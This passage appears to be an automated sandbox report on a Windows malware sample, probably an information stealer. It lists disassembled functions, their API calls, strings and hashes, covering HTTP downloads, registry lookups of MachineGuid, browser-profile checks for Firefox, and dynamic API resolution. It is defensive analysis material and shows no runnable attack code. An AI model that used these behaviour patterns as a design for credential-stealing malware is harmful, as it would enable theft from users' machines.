                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7419075C01258AACB11EBE5DD89DEFBB7DEF46304F10006EF515B3141DA388A89CBA5
                                                                                                                                                                                                                                                                  Function 0041310D Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00413112
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: _EH_prolog.MSVCRT ref: 00404F6D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FD0
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: StrCmpCA.SHLWAPI(?), ref: 00404FE4
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405007
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 0040503D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405061
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040506C
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040508A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413194
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004131AB
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D53: LocalAlloc.KERNEL32(00000040,004131C1,000000C8,00000001,?,004131C0,00000000,00000000), ref: 00410D6C
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 004131D2
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004131E7
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00413202
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                  • API String ID: 3807055897-1526165396
                                                                                                                                                                                                                                                                  • Opcode ID: 4d9da620a1a5e0b3dcbb29c584945f551d5abd9cb9b33b934421a06b03b94a7b
                                                                                                                                                                                                                                                                  • Instruction ID: 0a2888dd45e61a418bc20ba62eaa62e8ad1303f698d7cc5800680f20278165fb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d9da620a1a5e0b3dcbb29c584945f551d5abd9cb9b33b934421a06b03b94a7b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1641B0B1904258EACB10FFA5D956BED77B4AF19308F10407FE80573682DF7C5B488A6A
                                                                                                                                                                                                                                                                  Function 0040ED4F Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 373COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040ED54
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED98
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EE0C
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EF28
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D44E: _EH_prolog.MSVCRT ref: 0040D453
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B902: _EH_prolog.MSVCRT ref: 0040B907
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000), ref: 0040EFF7
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000), ref: 0040F06C
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040F187
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy
                                                                                                                                                                                                                                                                  • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                                                                                  • API String ID: 2120869262-2697854757
                                                                                                                                                                                                                                                                  • Opcode ID: c673e401afc107d5620e588305b2e22b38672d0502b4c63b525b2a4a47dc1761
                                                                                                                                                                                                                                                                  • Instruction ID: e3df1419439a2dafc4d67f36b25ecfbea69ccfa795f8b303c49576cfea4aa723
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c673e401afc107d5620e588305b2e22b38672d0502b4c63b525b2a4a47dc1761
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9E18F71D04248AADF10EBB9D946BDDBBB4AB15308F10807EE845776C2DB38574C8BA6
                                                                                                                                                                                                                                                                  Function 00404E08 Relevance: 15.1, APIs: 10, Instructions: 116networkfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00404E0D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E5C
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00404E76
                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E9A
                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EE2
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404F06
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00404F20
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404F27
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00404F30
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2737972104-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7133b705b4551f95528399036ae2e6112854ca6dcfe1a825456fc473669b7e6d
                                                                                                                                                                                                                                                                  • Instruction ID: d74cd6de3bd47137f9889cef4b860dedebf8a8dd5aa32f722f924b6a0cc73ebe
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7133b705b4551f95528399036ae2e6112854ca6dcfe1a825456fc473669b7e6d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F414CB1800249AFEB20EFA0DC85EEE77BDFB45304F10447AF611B2191DB385A898B65
                                                                                                                                                                                                                                                                  Function 0041045D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42registryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00410483
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,>eB,?,?,00000000), ref: 0041049F
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(>eB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 004104BE
                                                                                                                                                                                                                                                                  • CharToOemA.USER32(?,?), ref: 004104DB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                                                                                  • String ID: >eB$MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                  • API String ID: 1728412123-2070272321
                                                                                                                                                                                                                                                                  • Opcode ID: 073329d90dd0b28f1282f921cc7d727825b12edff1d53cac39abc855f9e95257
                                                                                                                                                                                                                                                                  • Instruction ID: 542951808218d9f2465ed4648b59cbb1e34f36a9af0a17ea3e60233f65be3e46
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 073329d90dd0b28f1282f921cc7d727825b12edff1d53cac39abc855f9e95257
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2014F7994021DFFDB10DB90DD89EEAB7BCEB15708F5000A1B644E2052EAB45FC88B60
                                                                                                                                                                                                                                                                  Function 004061DE Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406269
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3869837436-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4c12af5293247d0852290e9f84aca953a0241540781a611f6511e2904149f2bb
                                                                                                                                                                                                                                                                  • Instruction ID: 35711bfacf48629fa0f29843080878ebcda73aa91c01e9433e0666b6e19ec790
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c12af5293247d0852290e9f84aca953a0241540781a611f6511e2904149f2bb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5218B74900105ABDF21AFA5DC49EAF7BB9FF45710F20056EF912E62D0DB389951CB24
                                                                                                                                                                                                                                                                  Function 0040FFC9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory,00000000,?,004265FC), ref: 0040FFD7
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040FFDE
                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0040FFFE
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410024
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                  • String ID: %d MB$@
                                                                                                                                                                                                                                                                  • API String ID: 3644086013-3474575989
                                                                                                                                                                                                                                                                  • Opcode ID: c58ae50e157e084fb5eb09f6b26700478935f84c8f09dc0668bdf2d7ff4d155e
                                                                                                                                                                                                                                                                  • Instruction ID: eccb4bd644d002001be109ff5285c15e39b4e17480081bea73ca0ccbe80ef9ea
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c58ae50e157e084fb5eb09f6b26700478935f84c8f09dc0668bdf2d7ff4d155e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AF036B5600208ABEB109BA4DC4AFBE77BDE745745F440029F702E71C0DBB4D8858769
                                                                                                                                                                                                                                                                  Function 00415DA9 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00415DAE
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00415DDA
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 00415DF7
                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00415E17
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00415E46
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00415E59
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2333602472-0
                                                                                                                                                                                                                                                                  • Opcode ID: 551f176c852a6deed838df927c1851d4825e24eed5c4e02a754b8116951cdeaa
                                                                                                                                                                                                                                                                  • Instruction ID: bea494da033249d0684dc301a0f0449e1b9a709c4575af1f67fa8029bea30c00
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 551f176c852a6deed838df927c1851d4825e24eed5c4e02a754b8116951cdeaa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F416DB2C4021DABDF00EFA4DC86EDE7B7DEB05304F00456AB514A2151E735ABD98BE6
                                                                                                                                                                                                                                                                  Function 0041734B Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 00417430
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 0041743C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: LoadLibraryA.KERNEL32(The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser,0041735D), ref: 00417448
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 00417458
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 00417464
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 0041747C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 00417488
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 004174A8
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 004174B2
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004174C6
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004174DD
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004174F4
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 0041750B
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417522
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417539
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417550
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417567
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 0041757E
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417595
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004175AC
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004175C3
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004175DA
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004175F1
